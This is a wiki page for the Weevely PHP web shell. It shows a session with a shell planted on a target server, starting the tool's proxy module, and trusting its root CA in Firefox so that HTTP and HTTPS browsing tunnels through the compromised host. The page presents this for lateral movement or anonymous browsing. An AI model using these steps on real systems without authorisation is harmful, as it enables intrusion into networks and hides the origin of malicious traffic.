Skip to content

Proxy HTTP and HTTPS traffic

Jump to bottom
epinna edited this page Sep 20, 2014 · 1 revision

Weevely can run a local proxy to route the attacker HTTP/HTTPS traffic and move laterally on the target network.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
  • Used modules: net_proxy
  • Used browser: Mozilla Firefox

Session

Run the module.

$ ./weevely.py http://target/agent.php mypassword

[+] weevely 3.6.2

[+] Target:	target
[+] Session:	_weevely/sessions/target/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> :net_proxy
[-][proxy] Starting HTTP/HTTPS proxy at 'http://127.0.0.1:8080'
[-][proxy] Set the proxy to tunnel through the target. Visit 'http://weevely/' to install the certificate
[-][proxy] Proxy has been started in background and will shutdown at exit

Open FireFox and configure http://127.0.0.1:8080 as a Proxy under Preferences > General > Network Proxy.

Proxy settings

Visit http://weevely, check Trust this CA to identify web sites and install the root CA certificate.

Install certificate

Now you're fully setup to tunnel your HTTP and HTTPS browsing traffic through the compromised target.

Browsing

This can be used to browse the internet anonymously or, in penetration testing scenarios, to move deeper into the compromised network.

Clone this wiki locally